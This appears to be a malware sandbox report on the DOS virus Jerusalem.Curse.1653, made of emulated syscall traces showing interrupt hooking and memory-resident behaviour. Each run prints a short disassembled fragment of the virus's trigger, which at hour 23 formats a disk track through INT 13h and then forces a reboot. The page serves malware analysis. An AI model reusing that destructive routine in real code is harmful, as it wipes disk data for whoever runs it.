Sample viewer

vx.netlux.org/Virus.DOS.Jerusalem.Curse.1653.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:41:40.390221775Z 240 PC: 12ada | UNKNOWN!
2018-12-17T22:41:40.392621062Z 240 PC: 12b05 | UNKNOWN!
2018-12-17T22:41:40.394118287Z 74 PC: 12b88 | Reallocate memory
2018-12-17T22:41:40.395877738Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:41:40.398726299Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:41:40.400743003Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-17T22:41:40.403976137Z 75 PC: 12c19 | Execute program
2018-12-17T22:41:40.42027209Z 73 PC: 12c1f | Release memory
2018-12-17T22:41:40.421970557Z 77 PC: 12c23 | Get program return code
2018-12-17T22:41:40.423597245Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7301,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:19.493762281Z 240 PC: 12ada | UNKNOWN!
2018-12-25T12:01:19.495242091Z 240 PC: 12b05 | UNKNOWN!
2018-12-25T12:01:19.496260189Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:01:19.497505235Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.499732279Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.50127263Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-25T12:01:19.503551551Z 75 PC: 12c19 | Execute program
2018-12-25T12:01:19.522831026Z 73 PC: 12c1f | Release memory
2018-12-25T12:01:19.524416184Z 77 PC: 12c23 | Get program return code
2018-12-25T12:01:19.525807641Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":23,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7301,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:19.918929969Z 240 PC: 12ada | UNKNOWN!
2018-12-25T12:01:19.938932867Z 240 PC: 12b05 | UNKNOWN!
2018-12-25T12:01:19.940592451Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:01:19.942324561Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.944122711Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.94985298Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-25T12:01:19.952676478Z 25 PC: 12be7 | Get default drive
2018-12-25T12:01:22.165595047Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:01:22.168575285Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:01:22.171470527Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:01:22.175060564Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:01:22.186493795Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:01:22.188586991Z 62 PC: 91fc1 | Close file
2018-12-25T12:01:22.191971421Z 75 PC: 91fe0 | Execute program
2018-12-25T12:01:22.211865942Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:01:22.213188726Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:01:22.217867152Z 48 PC: c609 | Get DOS version
2018-12-25T12:01:22.22295557Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:01:22.226071289Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:01:22.229572742Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:01:22.234514481Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:01:22.238833609Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:01:22.24369045Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:01:22.255057069Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:01:22.256700744Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:01:22.258703633Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:01:22.282847605Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:01:22.288552736Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:01:22.290779633Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:01:22.292146734Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:01:22.294215322Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.295619524Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.296913408Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:01:22.305737897Z 62 PC: 8f8eb | Close file
2018-12-25T12:01:22.30759278Z 62 PC: 8f8f2 | Close file
2018-12-25T12:01:22.309264045Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.311544448Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.313275327Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.315057731Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.316854819Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.318537679Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.320042118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.321586451Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.323425071Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.325091189Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.326726863Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.329133996Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.330646764Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.332118585Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.339907249Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.341462145Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.342902221Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.345599767Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.347510066Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.349286105Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.351848185Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.353781104Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.355489098Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.357271893Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.359450881Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.361443984Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.363408837Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.365308598Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.366751521Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.36822014Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:01:22.374148237Z 62 PC: 8f90e | Close file
2018-12-25T12:01:22.375872017Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:01:22.37824256Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:01:22.380459841Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:01:22.385640777Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:01:22.387163505Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:01:22.392383887Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:01:22.394518291Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:01:22.39641209Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:01:22.398797634Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:01:22.400376833Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:01:22.401945658Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:01:22.404319681Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:01:22.406339995Z 73 PC: 8fa11 | Release memory
2018-12-25T12:01:22.408398943Z 73 PC: 8efea | Release memory
2018-12-25T12:01:22.41073081Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:01:22.412698872Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:01:22.414637387Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:01:22.416727614Z 73 PC: 8f060 | Release memory
2018-12-25T12:01:22.418235096Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:01:22.428163634Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:01:22.434661986Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:01:22.436305333Z 62 PC: 8f0d1 | Close file
2018-12-25T12:01:22.438219392Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:01:22.463529608Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:01:22.464865826Z 48 PC: 12bee | Get DOS version
2018-12-25T12:01:22.466600936Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:01:22.469122139Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:01:22.471231173Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:01:22.472940514Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:01:22.474942134Z 72 PC: 1355d | Allocate memory
2018-12-25T12:01:22.477593069Z 25 PC: 13596 | Get default drive
2018-12-25T12:01:22.479125447Z 71 PC: 135ad | Get current directory
2018-12-25T12:01:22.482088125Z 59 PC: 135ba | Change current directory
2018-12-25T12:01:22.489028558Z 59 PC: 135c8 | Change current directory
2018-12-25T12:01:22.495223357Z 59 PC: 135d3 | Change current directory
2018-12-25T12:01:22.498961988Z 25 PC: 12d13 | Get default drive
2018-12-25T12:01:22.500747543Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:01:22.50191227Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:01:22.503004346Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:01:22.505892859Z 80 PC: 1301d | Set current PSP
2018-12-25T12:01:22.506706762Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:01:22.507788088Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.512482424Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.513688018Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:01:22.515742093Z 72 PC: 130ec | Allocate memory
2018-12-25T12:01:22.517728824Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:01:22.525508793Z 62 PC: 131ba | Close file
2018-12-25T12:01:22.527592154Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:01:22.528669736Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:01:22.530281356Z 72 PC: 11991 | Allocate memory
2018-12-25T12:01:22.531892939Z 73 PC: 119b2 | Release memory
2018-12-25T12:01:22.533297878Z 72 PC: 119bd | Allocate memory
2018-12-25T12:01:22.535396119Z 73 PC: 119df | Release memory
2018-12-25T12:01:22.536519755Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:01:22.538097312Z 72 PC: 119fd | Allocate memory